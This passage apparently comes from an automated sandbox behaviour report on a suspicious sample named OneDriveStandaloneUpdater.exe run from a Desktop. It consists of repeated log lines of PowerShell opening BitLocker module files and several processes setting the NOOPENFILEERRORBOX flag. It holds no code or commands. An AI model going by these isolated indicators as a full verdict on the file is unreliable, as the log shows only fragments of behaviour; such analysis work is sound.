Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
